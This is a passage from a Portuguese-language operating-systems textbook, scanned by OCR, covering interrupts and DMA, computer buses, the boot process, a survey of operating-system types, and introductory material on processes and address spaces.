um laço curto, inquirindo continuamente o dispositivo 
para ver se ele terminou a operação (em geral há algum 
bit que indica que o dispositivo ainda está ocupado). 
Quando a operação de E/S termina, o driver coloca os 
dados (se algum) onde eles são necessários e retorna. O 
sistema operacional então retorna o controle a quem o 
chamou. Esse método é chamado de espera ocupada e 
tem a desvantagem de manter a CPU ocupada interro- 
gando o dispositivo até o término da operação de E/S. 

No segundo método, o driver inicia o dispositivo e 
pede a ele que o interrompa quando tiver terminado. 
Nesse ponto, o driver retorna. O sistema operacional 
bloqueia então o programa que o chamou, se necessá- 
rio, e procura por mais trabalho para fazer. Quando o 
controlador detecta o fim da transferência, ele gera uma 
interrupção para sinalizar o término. 

Interrupções são muito importantes nos sistemas 
operacionais, então vamos examinar a ideia mais de 
perto. Na Figura 1.11(a), vemos um processo de quatro 
passos para a E/S. No passo 1, o driver diz para o con- 
trolador o que fazer escrevendo nos seus registradores 
de dispositivo. O controlador então inicia o dispositi- 
vo. Quando o controlador termina de ler ou escrever o 


[e REN (a) Os passos para iniciar um dispositivo de E/S e obter uma interrupção. (b) O processamento de interrupção envolve obter 
a interrupção, executar o tratador de interrupção e retornar ao programa do usuário. 
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número de bytes que lhe disseram para transferir, ele 
sinaliza o chip controlador de interrupção usando deter- 
minadas linhas de barramento no passo 2. Se o controla- 
dor de interrupção está pronto para aceitar a interrupção 
(o que ele talvez não esteja, se estiver ocupado lidando 
com uma interrupção de maior prioridade), ele sinaliza 
isso à CPU no passo 3. No passo 4, o controlador de in- 
terrupção insere o número do dispositivo no barramento 
de maneira que a CPU possa lê-lo e saber qual dispositi- 
vo acabou de terminar (muitos dispositivos podem estar 
sendo executados ao mesmo tempo). 

Uma vez que a CPU tenha decidido aceitar a inter- 
rupção, o contador de programa (PC) e a palavra de esta- 
do do programa (PSW) normalmente são empilhados na 
pilha atual e a CPU chaveada para o modo núcleo. O nú- 
mero do dispositivo pode ser usado como um índice para 
parte da memória para encontrar o endereço do tratador 
de interrupção (interrupt handler) para esse dispositivo. 
Essa parte da memória é chamada de vetor de interrup- 
ção. Uma vez que o tratador de interrupção (parte do dri- 
ver para o dispositivo de interrupção) tenha iniciado, ele 
remove o contador de programa e PSW empilhados e os 
salva, e então indaga o dispositivo para saber como está 
a sua situação. Assim que o tratador de interrupção tenha 
sido encerrado, ele retorna para o programa do usuário 
previamente executado para a primeira instrução que 
ainda não tenha sido executada. Esses passos são mos- 
trados na Figura 1.11 (b). 

O terceiro método para implementar E/S faz uso de 
um hardware especial: um chip DMA (Direct Memory 
Access — acesso direto à memória) que pode controlar 
o fluxo de bits entre a memória e algum controlador sem 
a intervenção da CPU constante. A CPU configura o chip 
DMA, dizendo a ele quantos bytes transferir, o dispositivo 


[FIGURA 1.12] A estrutura de um sistema x86 grande. 


e endereços de memória envolvidos, e a direção, e então o 
deixa executar. Quando o chip de DMA tiver finalizado a 
sua tarefa, ele causa uma interrupção, que é tratada como 
já descrito. Os hardwares de DMA e E/S em geral serão 
discutidos mais detalhadamente no Capítulo 5. 

Interrupções podem (e muitas vezes isso ocorre) acon- 
tecer em momentos altamente inconvenientes, por exem- 
plo, enquanto outro tratador de interrupção estiver em 
execução. Por essa razão, a CPU tem uma maneira para 
desabilitar interrupções e então reabilitá-las depois. En- 
quanto as interrupções estiverem desabilitadas, quaisquer 
dispositivos que terminem suas atividades continuam a 
emitir sinais de interrupção, mas a CPU não é interrom- 
pida até que as interrupções sejam habilitadas novamente. 
Se múltiplos dispositivos finalizarem enquanto as inter- 
rupções estiverem desabilitadas, o controlador de inter- 
rupção decide qual deixar passar primeiro, normalmente 
baseado em prioridades estáticas designadas para cada 
dispositivo. O dispositivo de maior prioridade vence e é 
servido primeiro. Os outros precisam esperar. 


1.3.5 Barramentos 


A organização da Figura 1.6 foi usada em micro- 
computadores por anos e também no IBM original. No 
entanto, à medida que os processadores e as memórias 
foram ficando mais rápidos, a capacidade de um único 
barramento (e certamente o barramento do PC IBM) de 
lidar com todo o tráfego foi exigida até o limite. Algo 
tinha de ceder. Como resultado, barramentos adicionais 
foram acrescentados, tanto para dispositivos de E/S mais 
rápidos quanto para o tráfego CPU para memória. Como 
consequência dessa evolução, um sistema x86 grande 
atualmente se parece com algo como a Figura 1.12. 
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Este sistema tem muitos barramentos (por exemplo, 
cache, memória, PCIe, PCI, USB, SATA e DMI), cada 
um com uma taxa de transferência e função diferentes. 
O sistema operacional precisa ter ciência de todos eles 
para configuração e gerenciamento. O barramento prin- 
cipal é o PCle (Peripheral Component Interconnect 
Express — interconexão expressa de componentes 
periféricos). 

O PCle foi inventado pela Intel como um sucessor 
para o barramento PCI mais antigo, que por sua vez 
foi uma substituição para o barramento ISA (Indus- 
try Standard Architecture — arquitetura padrão in- 
dustrial). Capaz de transferir dezenas de gigabits por 
segundo, o PCIe é muito mais rapido que os seus prede- 
cessores. Ele também é muito diferente em sua nature- 
za. Uma arquitetura de barramento compartilhado 
significa que múltiplos dispositivos usam os mesmos 
fios para transferir dados. Assim, quando múltiplos dis- 
positivos têm dados para enviar, você precisa de um ár- 
bitro para determinar quem pode utilizar o barramento. 
Em comparação, o PCle faz uso de conexões dedicadas 
de ponto a ponto. Uma arquitetura de barramento 
paralela como usada no PCI tradicional significa que 
você pode enviar uma palavra de dados através de múl- 
tiplos fios. Por exemplo, em barramentos PCI regulares, 
um único número de 32 bits é enviado através de 32 fios 
paralelos. Em comparação com isso, o PCle usa uma 
arquitetura de barramento serial e envia todos os bits 
em uma mensagem através de uma única conexão, cha- 
mada faixa, de maneira muito semelhante a um pacote 
de rede. Isso é muito mais simples, pois você não tem 
de assegurar que todos os 32 bits cheguem ao destino 
exatamente ao mesmo tempo. O paralelismo ainda é 
usado, pois você pode ter múltiplas faixas em paralelo. 
Por exemplo, podemos usar 32 faixas para carregar 32 
mensagens em paralelo. À medida que a velocidade de 
dispositivos periféricos como cartões de rede e adapta- 
dores de gráficos aumenta rapidamente, o padrão PCle 
é atualizado a cada 3-5 anos. Por exemplo, 16 faixas de 
PCle 2.0 oferecem 64 gigabits por segundo. Atualizar 
para PCle 3.0 dará a você duas vezes aquela velocidade 
e o PCle 4.0 dobrará isso novamente. 

Enquanto isso, ainda temos muitos dispositivos 
de legado do padrão PCI mais antigo. Como vemos 
na Figura 1.12, esses dispositivos estão ligados a um 
centro processador em separado. No futuro, quando 
virmos o PCI não mais como meramente velho, mas 
ancestral, é possível que todos os dispositivos PCI vão 
se ligar a mais um centro ainda que, por sua vez, vai 
conectá-los ao centro principal, criando uma árvore de 
barramentos. 
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Nessa configuração, a CPU se comunica com a me- 
mória por meio de um barramento DDR3 rápido, com 
um dispositivo gráfico externo através do PCIe e com 
todos os outros dispositivos via um centro controlador 
usando um barramento DMI (Direct Media Interfa- 
ce — interface de midia direta). O centro por sua vez 
conecta-se com todos os outros dispositivos, usando 
o Barramento Serial Universal para conversar com os 
dispositivos USB, o barramento SATA para interagir 
com discos rígidos e acionadores de DVD, e o PCle 
para transferir quadros (frames) Ethernet. Já menciona- 
mos os dispositivos PCI que usam um barramento PCI 
tradicional. 

Além disso, cada um dos núcleos tem uma cache de- 
dicada e uma muito maior que é compartilhada entre 
eles. Cada uma dessas caches introduz outro barramento. 

O USB (Universal Serial Bus — barramento serial 
universal) foi inventado para conectar todos os dispo- 
sitivos de E/S lentos, como o teclado e o mouse, ao 
computador. No entanto, chamar um dispositivo USB 
3.0 zunindo a 5 Gbps de “lento” pode não soar natural 
para a geração que cresceu com o ISA de 8 Mbps como 
o barramento principal nos primeiros PCs da IBM. O 
USB usa um pequeno conector com quatro a onze fios 
(dependendo da versão), alguns dos quais fornecem 
energia elétrica para os dispositivos USB ou conectam- 
-se com o terra. O USB é um barramento centralizado 
no qual um dispositivo-raiz interroga todos os dispo- 
sitivos de E/S a cada 1 ms para ver se eles têm algum 
tráfego. O USB 1.0 pode lidar com uma carga agregada 
de 12 Mbps, o USB 2.0 aumentou a velocidade para 
480 Mbps e o USB 3.0 chega a não menos que 5 Gbps. 
Qualquer dispositivo USB pode ser conectado a um 
computador e ele funcionará imediatamente, sem exigir 
uma reinicialização, algo que os dispositivos pré-USB 
exigiam para a consternação de uma geração de usuá- 
rios frustrados. 

O barramento SCSI (Small Computer System In- 
terface — interface pequena de sistema computacio- 
nal) é um barramento de alto desempenho voltado para 
discos rápidos, digitalizadores de imagens e outros dis- 
positivos que precisam de uma considerável largura de 
banda. Hoje em dia, eles são encontrados na maior parte 
das vezes em servidores e estações de trabalho, e podem 
operar a até 640 MB/s. 

Para trabalhar em um ambiente como o da Figura 
1.12, o sistema operacional tem de saber quais dispo- 
sitivos periféricos estão conectados ao computador e 
configurá-los. Essa exigência levou a Intel e a Micro- 
soft a projetar um sistema para o PC chamado de plug 
and play, baseado em um conceito similar primeiro 
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implementado no Apple Macintosh. Antes do plug and 
play, cada placa de E/S tinha um nível fixo de requi- 
sição de interrupção e endereços específicos para seus 
registradores de E/S. Por exemplo, o teclado era inter- 
rupção 1 e usava endereços 0x60 a 0x64, o controlador 
de disco flexível era a interrupção 6 e usava endereços 
de E/S 0x3F0 a 0x3F7, e a impressora era a interrupção 
7 e usava os endereços de E/S 0x378 a 0x37A, e assim 
por diante. 

Até aqui, tudo bem. O problema começava quando o 
usuário trazia uma placa de som e uma placa de modem 
e ocorria de ambas usarem, digamos, a interrupção 4. 
Elas entravam em conflito e não funcionavam juntas. 
A solução era incluir chaves DIP ou jumpers em todas 
as placas de E/S e instruir o usuário a ter o cuidado de 
configurá-las para selecionar o nível de interrupção e 
endereços dos dispositivos de E/S que não entrassem 
em conflito com quaisquer outros no sistema do usu- 
ário. Adolescentes que devotaram a vida às complexi- 
dades do hardware do PC podiam fazê-lo às vezes sem 
cometer erros. Infelizmente, ninguém mais conseguia, 
levando ao caos. 

O plug and play faz o sistema coletar automatica- 
mente informações sobre os dispositivos de E/S, atribuir 
centralmente níveis de interrupção e endereços desses 
dispositivos e, então, informar a cada placa quais são os 
seus números. Esse trabalho está relacionado de perto 
à inicialização do computador, então vamos examinar 
essa questão. Ela não é completamente trivial. 


1.3.6 Inicializando o computador 


De modo bem resumido, o processo de inicialização 
funciona da seguinte maneira: todo PC contém uma pa- 
rentboard (placa-pais) (que era chamada de placa-mãe 
antes da onda politicamente correta atingir a indústria 
de computadores). Na placa-pais há um programa cha- 
mado de sistema BIOS (Basic Input Output System 
— sistema básico de entrada e saída). O BIOS conta 
com rotinas de E/S de baixo nível, incluindo procedi- 
mentos para ler o teclado, escrever na tela e realizar a 
E/S no disco, entre outras coisas. Hoje, ele fica em um 
flash RAM, que é não volátil, mas que pode ser atuali- 
zado pelo sistema operacional quando erros são encon- 
trados no BIOS. 

Quando o computador é inicializado, o BIOS co- 
meça a executar. Primeiro ele confere para ver quanta 
RAM está instalada e se o teclado e os outros dispo- 
sitivos básicos estão instalados e respondendo correta- 
mente. Ele segue varrendo os barramentos PCle e PCI 
para detectar todos os dispositivos ligados a ele. Se os 


dispositivos presentes forem diferentes de quando o sis- 
tema foi inicializado pela última vez, os novos disposi- 
tivos são configurados. 

O BIOS então determina o dispositivo de iniciali- 
zação tentando uma lista de dispositivos armazenados 
na memória CMOS. O usuário pode mudar essa lista 
entrando em um programa de configuração do BIOS 
logo após a inicialização. Tipicamente, é feita uma ten- 
tativa para inicializar a partir de uma unidade de CD- 
-ROM (ou às vezes USB), se houver uma. Se isso não 
der certo, o sistema inicializa a partir do disco rígido. 
O primeiro setor do dispositivo de inicialização é lido 
na memória e executado. Ele contém um programa que 
normalmente examina a tabela de partições no final do 
setor de inicialização para determinar qual partição está 
ativa. Então um carregador de inicialização secundário 
é lido daquela partição. Esse carregador lê o sistema 
operacional da partição ativa e, então, o inicia. 

O sistema operacional consulta então o BIOS para 
conseguir as informações de configuração. Para cada 
dispositivo, ele confere para ver se possui o driver do 
dispositivo. Se não possuir, pede para o usuário inserir 
um CD-ROM contendo o driver (fornecido pelo fabri- 
cante do dispositivo) ou para baixá-lo da internet. Assim 
que todos os drivers dos dispositivos estiverem disponi- 
veis, O sistema operacional os carrega no núcleo. Então 
ele inicializa suas tabelas, cria os processos de segundo 
plano necessários e inicia um programa de identificação 
(login) ou uma interface gráfica GUI. 


1.4 O zoológico dos sistemas 
operacionais 


Os sistemas operacionais existem há mais de meio 
século. Durante esse tempo, uma variedade bastante 
significativa deles foi desenvolvida, nem todos bastante 
conhecidos. Nesta seção abordaremos brevemente nove 
deles. Voltaremos a alguns desses tipos diferentes de 
sistemas mais tarde no livro. 


1.4.1 Sistemas operacionais de computadores de 
grande porte 


No topo estão os sistemas operacionais para com- 
putadores de grande porte (mainframes), aquelas má- 
quinas do tamanho de uma sala ainda encontradas nos 
centros de processamento de dados de grandes cor- 
porações. Esses computadores diferem dos computa- 
dores pessoais em termos de sua capacidade de E/S. 


Um computador de grande porte com 1.000 discos e 
milhões de gigabytes de dados não é incomum; um 
computador pessoal com essas especificações causa- 
ria inveja aos seus amigos. Computadores de grande 
porte também estão retornando de certa maneira como 
servidores sofisticados da web, para sites de comércio 
eletrônico em larga escala e para transações entre em- 
presas (business-to-business). 

Os sistemas operacionais para computadores de 
grande porte são intensamente orientados para o proces- 
samento de muitas tarefas ao mesmo tempo, a maioria 
delas exigindo quantidades prodigiosas de E/S. Eles em 
geral oferecem três tipos de serviços: em lote (batch), 
processamento de transações e tempo compartilhado 
(timesharing). Um sistema em lote processa tarefas 
rotineiras sem qualquer usuário interativo presente. O 
processamento de apólices em uma companhia de se- 
guros ou relatórios de vendas para uma cadeia de lojas 
é tipicamente feito em modo de lote. Sistemas de pro- 
cessamento de transações lidam com grandes números 
de pedidos pequenos, por exemplo, processamento de 
cheques em um banco ou reservas de companhias aére- 
as. Cada unidade de trabalho é pequena, mas o sistema 
tem de lidar com centenas ou milhares por segundo. Sis- 
temas de tempo compartilhado permitem que múltiplos 
usuários remotos executem tarefas no computador ao 
mesmo tempo, como na realização de consultas a um 
grande banco de dados. Essas funções são proximamen- 
te relacionadas; sistemas operacionais em computado- 
res de grande porte muitas vezes executam todas elas. 
Um exemplo de sistema operacional de computadores 
de grande porte é o OS/390, um descendente do OS/360. 
No entanto, sistemas operacionais de computadores de 
grande porte estão pouco a pouco sendo substituídos 
por variantes UNIX como o Linux. 


1.4.2 Sistemas operacionais de servidores 


Um nível abaixo estão os sistemas operacionais de 
servidores. Eles são executados em servidores que são 
computadores pessoais muito grandes, em estações de 
trabalho ou mesmo computadores de grande porte. Eles 
servem a múltiplos usuários ao mesmo tempo por meio 
de uma rede e permitem que os usuários compartilhem 
recursos de hardware e software. Servidores podem for- 
necer serviços de impressão, de arquivo ou de web. Pro- 
vedores de acesso à internet utilizam várias máquinas 
servidoras para dar suporte aos clientes, e sites usam 
servidores para armazenar páginas e lidar com as re- 
quisições que chegam. Sistemas operacionais típicos 
de servidores são Solaris, FreeBSD, Linux e Windows 
Server 201x. 
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1.4.3 Sistemas operacionais de multiprocessadores 


Uma maneira cada vez mais comum de se obter po- 
tência computacional para valer é conectar múltiplas 
CPUs a um único sistema. Dependendo de como pre- 
cisamente eles são conectados e o que é compartilhado, 
esses sistemas são chamados de computadores parale- 
los, multicomputadores ou multiprocessadores. Eles 
precisam de sistemas operacionais especiais, porém 
muitas vezes esses são variações dos sistemas operacio- 
nais de servidores, com aspectos especiais para comuni- 
cação, conectividade e consistência. 

Com o advento recente de chips multinúcleo para 
computadores pessoais, mesmo sistemas operacionais 
de computadores de mesa e notebooks convencionais 
estão começando a lidar com pelo menos multipro- 
cessadores de pequena escala, e é provável que o nú- 
mero de núcleos cresça com o tempo. Felizmente, já 
sabemos bastante a respeito de sistemas operacionais 
de multiprocessadores de anos de pesquisa anteriores, 
de maneira que utilizar esse conhecimento em sistemas 
multinúcleo não deverá ser difícil. A parte difícil será 
fazer com que os aplicativos usem toda essa potência 
computacional. Muitos sistemas operacionais popu- 
lares, incluindo Windows e Linux, são executados em 
multiprocessadores. 


1.4.4 Sistemas operacionais de computadores 
pessoais 


A próxima categoria é a do sistema operacional de 
computadores pessoais. Todos os computadores moder- 
nos dão suporte à multiprogramação, muitas vezes com 
dezenas de programas iniciados no momento da inicia- 
lização do sistema. Seu trabalho é proporcionar um bom 
apoio para um único usuário. Eles são amplamente usa- 
dos para o processamento de texto, planilhas e acesso à 
internet. Exemplos comuns são o Linux, o FreeBSD, o 
Windows 7, o Windows 8 e o OS X da Apple. Sistemas 
operacionais de computadores pessoais são tão conheci- 
dos que provavelmente é necessária pouca introdução. 
Na realidade, a maioria das pessoas nem sabe que exis- 
tem outros tipos. 


1.4.5 Sistemas operacionais de computadores 
portáteis 


Seguindo com sistemas cada vez menores, chegamos 
aos tablets, smartphones e outros computadores portá- 
teis. Um computador portátil, originalmente conhecido 
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como um PDA (Personal Digital Assistant — assis- 
tente pessoal digital), é um computador pequeno que 
pode ser seguro na mão durante a operação. Smartpho- 
nes e tablets são os exemplos mais conhecidos. Como 
já vimos, esse mercado está dominado pelo Android do 
Google e o iOS da Apple, mas eles têm muitos compe- 
tidores. A maioria deles conta com CPUs multinúcleo, 
GPS, câmeras e outros sensores, quantidades enormes 
de memória e sistemas operacionais sofisticados. Além 
disso, todos eles têm mais aplicativos (“apps”) de ter- 
ceiros que você possa imaginar. 


1.4.6 Sistemas operacionais embarcados 


Sistemas embarcados são executados em computa- 
dores que controlam dispositivos que não costumam ser 
vistos como computadores e que não aceitam softwares 
instalados pelo usuário. Exemplos típicos são os fornos 
de micro-ondas, os aparelhos de televisão, os carros, os 
aparelhos de DVD, os telefones tradicionais e os MP3 
players. A principal propriedade que distingue sistemas 
embarcados dos portáteis é a certeza de que nenhum 
software não confiável vá ser executado nele um dia. 
Você não consegue baixar novos aplicativos para o seu 
forno de micro-ondas — todo o software está na memó- 
ria ROM. Isso significa que não há necessidade para 
proteção entre os aplicativos, levando a simplificações 
no design. Sistemas como o Embedded Linux, QNX e 
VxWorks são populares nesse domínio. 


1.4.7 Sistemas operacionais de nós sensores 
(sensor-node) 


Redes de nós sensores minúsculos estão sendo em- 
pregadas para uma série de finalidades. Esses nós são 
computadores minúsculos que se comunicam entre si 
e com uma estação-base usando comunicação sem fio. 
Redes de sensores são usadas para proteger os perime- 
tros de prédios, guardar fronteiras nacionais, detectar 
incêndios em florestas, medir a temperatura e a precipi- 
tação para a previsão de tempo, colher informações so- 
bre a movimentação de inimigos nos campos de batalha 
e muito mais. 

Os sensores são computadores pequenos movidos a 
bateria com rádios integrados. Eles têm energia limitada 
e precisam funcionar por longos períodos desacompanha- 
dos ao ar livre e frequentemente em condições severas. A 
rede tem de ser robusta o suficiente para tolerar falhas de 
nós individuais, o que acontece cada vez com mais fre- 
quência à medida que as baterias começam a se esgotar. 


Cada nó sensor é um computador verdadeiro, com 
uma CPU, RAM, ROM e um ou mais sensores ambien- 
tais. Ele executa um sistema operacional pequeno, mas 
verdadeiro, em geral orientado a eventos, respondendo 
a eventos externos ou tomando medidas periodicamente 
com base em um relógio interno. O sistema operacio- 
nal tem de ser pequeno e simples, pois os nós têm uma 
RAM pequena e a duração da bateria é uma questão fun- 
damental. Também, como com os sistemas embarcados, 
todos os programas são carregados antecipadamente; os 
usuários não inicializam subitamente os programas que 
eles baixaram da internet, o que torna o design muito 
mais simples. TinyOS é um sistema operacional bem 
conhecido para um nó sensor. 


1.4.8 Sistemas operacionais de tempo real 


Outro tipo de sistema operacional é o sistema de 
tempo real. Esses sistemas são caracterizados por ter 
o tempo como um parâmetro-chave. Por exemplo, em 
sistemas de controle de processo industrial, computa- 
dores em tempo real têm de coletar dados a respeito do 
processo de produção e usá-los para controlar máqui- 
nas na fábrica. Muitas vezes há prazos rígidos a serem 
cumpridos. Por exemplo, se um carro está seguindo pela 
linha de montagem, determinadas ações têm de ocorrer 
em dados instantes. Se, por exemplo, um robô soldador 
fizer as soldas cedo demais ou tarde demais, o carro será 
arruinado. Se a ação tem de ocorrer absolutamente em 
um determinado momento (ou dentro de uma dada faixa 
de tempo), temos um sistema de tempo real crítico. 
Muitos desses sistemas são encontrados no controle de 
processos industriais, aviônica, militar e áreas de apli- 
cação semelhantes. Esses sistemas têm de fornecer ga- 
rantias absolutas de que uma determinada ação ocorrerá 
em um determinado momento. 

Um sistema de tempo real não crítico é aquele em 
que perder um prazo ocasional, embora não desejável, 
é aceitável e não causa danos permanentes. Sistemas 
de multimídia ou áudio digital caem nesta categoria. 
Smartphones também são sistemas de tempo real não 
críticos. 

Tendo em vista que cumprir prazos é algo crucial 
nos sistemas de tempo real (críticos), às vezes o sistema 
operacional é nada mais que uma biblioteca conectada 
com os programas aplicativos, com todas as partes do 
sistema estreitamente acopladas e sem nenhuma prote- 
ção entre si. Um exemplo desse tipo de sistema de tem- 
po real é o eCos. 

As categorias de sistemas portáteis, embarcados e 
de tempo real se sobrepõem consideravelmente. Quase 


todas elas têm pelo menos algum aspecto de tempo real 
não crítico. Os sistemas de tempo real e embarcado exe- 
cutam apenas softwares inseridos pelos projetistas do 
sistema; usuários não podem acrescentar seu próprio 
software, o que torna a proteção mais fácil. Os sistemas 
portáteis e embarcados são direcionados para os con- 
sumidores, ao passo que os sistemas de tempo real são 
mais voltados para o uso industrial. Mesmo assim, eles 
têm aspectos em comum. 


1.4.9 Sistemas operacionais de cartões 
inteligentes (smartcard) 


Os menores sistemas operacionais são executados 
em cartões inteligentes, que são dispositivos do tama- 
nho de cartões de crédito contendo um chip de CPU. 
Possuem severas restrições de memória e processamen- 
to de energia. Alguns obtêm energia por contatos no lei- 
tor no qual estão inseridos, mas cartões inteligentes sem 
contato obtêm energia por indução, o que limita muito 
o que eles podem fazer. Alguns deles conseguem reali- 
zar somente uma função, como pagamentos eletrônicos, 
mas outros podem realizar múltiplas funções. Muitas 
vezes são sistemas proprietários. 

Alguns cartões inteligentes são orientados a Java. 
Isso significa que o ROM no cartão inteligente contém 
um interpretador para a Java Virtual Machine (JVM — 
Máquina virtual Java). Os aplicativos pequenos (applets) 
Java são baixados para o cartão e são interpretados pelo 
JVM. Alguns desses cartões podem lidar com múltiplos 
applets Java ao mesmo tempo, levando à multiprograma- 
ção e à necessidade de escaloná-los. O gerenciamento de 
recursos e a proteção também se tornam um problema 
quando dois ou mais applets estão presentes ao mesmo 
tempo. Essas questões devem ser tratadas pelo sistema 
operacional (em geral extremamente primitivo) presente 
no cartão. 


1.5 Conceitos de sistemas operacionais 


A maioria dos sistemas operacionais fornece de- 
terminados conceitos e abstrações básicos, como 
processos, espaços de endereços e arquivos, que são 
fundamentais para compreendê-los. Nas seções a se- 
guir, examinaremos alguns desses conceitos básicos 
de maneira bastante breve, como uma introdução. Vol- 
taremos a cada um deles detalhadamente mais tarde 
neste livro. Para ilustrar esses conceitos, de tempos 
em tempos usaremos exemplos, geralmente tirados 
do UNIX. No entanto, exemplos similares existem em 
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outros sistemas também, e estudaremos alguns deles 
mais tarde. 


1.5.1 Processos 


Um conceito fundamental em todos os sistemas ope- 
racionais é o processo. Um processo é basicamente um 
programa em execução. Associado a cada processo está 
o espaço de endereçamento, uma lista de posições de 
memória que vai de O a algum máximo, onde o pro- 
cesso pode ler e escrever. O espaço de endereçamento 
contém o programa executável, os dados do programa e 
sua pilha. Também associado com cada processo há um 
conjunto de recursos, em geral abrangendo registrado- 
res (incluindo o contador de programa e o ponteiro de 
pilha), uma lista de arquivos abertos, alarmes penden- 
tes, listas de processos relacionados e todas as demais 
informações necessárias para executar um programa. 
Um processo é na essência um contêiner que armaze- 
na todas as informações necessárias para executar um 
programa. 

Voltaremos para o conceito de processo com muito 
mais detalhes no Capítulo 2. Por ora, a maneira mais fá- 
cil de compreender intuitivamente um processo é pensar 
a respeito do sistema de multiprogramação. O usuário 
pode ter inicializado um programa de edição de vídeo 
e o instruído a converter um vídeo de uma hora para 
um determinado formato (algo que pode levar horas) e 
então partido para navegar na web. Enquanto isso, um 
processo em segundo plano que desperta de tempos em 
tempos para conferir o e-mail que chega pode ter come- 
çado a ser executado. Desse modo, temos (pelo menos) 
três processos ativos: o editor de vídeo, o navegador da 
web e o receptor de e-mail. Periodicamente, o sistema 
operacional decide parar de executar um processo e co- 
meça a executar outro, talvez porque o primeiro utilizou 
mais do que sua parcela de tempo da CPU no último 
segundo ou dois. 

Quando um processo é suspenso temporariamen- 
te assim, ele deve ser reiniciado mais tarde no exato 
mesmo estado em que estava quando foi parado. Isso 
significa que todas as informações a respeito do proces- 
so precisam ser explicitamente salvas em algum lugar 
durante a suspensão. Por exemplo, o processo pode ter 
vários arquivos abertos para leitura ao mesmo tempo. 
Há um ponteiro associado com cada um desses arquivos 
dando a posição atual (isto é, o número do byte ou re- 
gistro a ser lido em seguida). Quando um processo está 
temporariamente suspenso, todos esses ponteiros têm 
de ser salvos de maneira que uma chamada read execu- 
tada após o processo ter sido reiniciado vá ler os dados 
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corretos. Em muitos sistemas operacionais, todas as in- 
formações a respeito de cada processo, fora o conteúdo 
do seu próprio espaço de endereçamento, estão armaze- 
nadas em uma tabela do sistema operacional chamada 
de tabela de processos, que é um arranjo de estruturas, 
uma para cada processo existente no momento. 

Desse modo, um processo (suspenso) consiste em 
seu espaço de endereçamento, em geral chamado de 
imagem do núcleo (em homenagem às memórias de 
núcleo magnético usadas antigamente), e de sua entrada 
na tabela de processo, que armazena os conteúdos de 
seus registradores e muitos outros itens necessários para 
reiniciar o processo mais tarde. 

As principais chamadas de sistema de gerenciamen- 
to de processos são as que lidam com a criação e o tér- 
mino de processos. Considere um exemplo típico. Um 
processo chamado de interpretador de comandos ou 
shell lê os comandos de um terminal. O usuário acabou 
de digitar um comando requisitando que um programa 
seja compilado. O shell tem de criar agora um novo 
processo que vai executar o compilador. Quando esse 
processo tiver terminado a compilação, ele executa uma 
chamada de sistema para se autofinalizar. 

Se um processo pode criar um ou mais processos 
(chamados de processos filhos), e estes por sua vez po- 
dem criar processos filhos, chegamos logo à estrutura 
da árvore de processo da Figura 1.13. Processos rela- 
cionados que estão cooperando para finalizar alguma 
tarefa muitas vezes precisam comunicar-se entre si e 
sincronizar as atividades. Essa comunicação é chamada 
de comunicação entre processos, e será analisada de- 
talhadamente no Capítulo 2. 

Outras chamadas de sistemas de processos permitem 
requisitar mais memória (ou liberar memória não utili- 
zada), esperar que um processo filho termine e sobrepor 
seu programa por um diferente. 

Há ocasionalmente uma necessidade de se transmitir 
informação para um processo em execução que não está 
parado esperando por ela. Por exemplo, um processo 
que está se comunicando com outro em um computador 


le 7: mk Uma árvore de processo. O processo A criou dois 
processos filhos, Be C. O processo B criou três 
processos filhos, D, E e F. 


diferente envia mensagens para o processo remoto por 
intermédio de uma rede de computadores. Para evitar a 
possibilidade de uma mensagem ou de sua resposta ser 
perdida, o emissor pode pedir para o seu próprio sistema 
operacional notificá-lo após um número especificado 
de segundos, de maneira que ele possa retransmitir a 
mensagem se nenhuma confirmação tiver sido recebida 
ainda. Após ligar esse temporizador, o programa pode 
continuar executando outra tarefa. 

Decorrido o número especificado de segundos, o 
sistema operacional envia um sinal de alarme para o 
processo. O sinal faz que o processo suspenda por al- 
gum tempo o que quer que ele esteja fazendo, salve seus 
registradores na pilha e comece a executar uma rotina 
especial para tratamento desse sinal, por exemplo, para 
retransmitir uma mensagem presumivelmente perdida. 
Quando a rotina de tratamento desse sinal encerra sua 
ação, o processo em execução é reiniciado no estado em 
que se encontrava um instante antes do sinal. Sinais são 
os análogos em software das interrupções em hardwares 
e podem ser gerados por uma série de causas além de 
temporizadores expirando. Muitas armadilhas detecta- 
das por hardwares, como executar uma instrução ilegal 
ou utilizar um endereço inválido, também são converti- 
das em sinais para o processo culpado. 

A cada pessoa autorizada a usar um sistema é desig- 
nada uma UID (User IDentification — identificação 
do usuário) pelo administrador do sistema. Todo pro- 
cesso iniciado tem a UID da pessoa que o iniciou. Um 
processo filho tem a mesma UID que o seu processo 
pai. Usuários podem ser membros de grupos, cada qual 
com uma GID (Group IDentification — identificação 
do grupo). 

Uma UID, chamada de superusuário (em UNIX), 
ou Administrador (no Windows), tem um poder espe- 
cial e pode passar por cima de muitas das regras de pro- 
teção. Em grandes instalações, apenas o administrador 
do sistema sabe a senha necessária para tornar-se um 
superusuário, mas muitos dos usuários comuns (espe- 
cialmente estudantes) devotam um esforço considerável 
buscando falhas no sistema que permitam que eles se 
tornem superusuários sem a senha. 

Estudaremos processos e comunicações entre pro- 
cessos no Capítulo 2. 


1.5.2 Espaços de endereçamento 


Todo computador tem alguma memória principal 
que ele usa para armazenar programas em execução. 
Em um sistema operacional muito simples, apenas um 
programa de cada vez está na memória. Para executar 


um segundo programa, o primeiro tem de ser removido 
e o segundo colocado na memória. 

Sistemas operacionais mais sofisticados permitem 
que múltiplos programas estejam na memória ao mes- 
mo tempo. Para evitar que interfiram entre si (e com o 
sistema operacional), algum tipo de mecanismo de pro- 
teção é necessário. Embora esse mecanismo deva estar 
no hardware, ele é controlado pelo sistema operacional. 

Este último ponto de vista diz respeito ao gerencia- 
mento e à proteção da memória principal do computa- 
dor. Uma questão diferente relacionada à memória, mas 
igualmente importante, é o gerenciamento de espaços de 
endereçamento dos processos. Em geral, cada processo 
tem algum conjunto de endereços que ele pode usar, ti- 
picamente indo de O até algum máximo. No caso mais 
simples, a quantidade máxima de espaço de endereços 
que um processo tem é menor do que a memória princi- 
pal. Dessa maneira, um processo pode preencher todo o 
seu espaço de endereçamento e haverá espaço suficien- 
te na memória principal para armazená-lo inteiramente. 

No entanto, em muitos computadores os endereços 
são de 32 ou 64 bits, dando um espaço de endereçamen- 
to de 2” e 2%, respectivamente. O que acontece se um 
processo tem mais espaço de endereçamento do que o 
computador tem de memória principal e o processo quer 
usá-lo inteiramente? Nos primeiros computadores, ele 
não teria sorte. Hoje, existe uma técnica chamada me- 
mória virtual, como já mencionado, na qual o sistema 
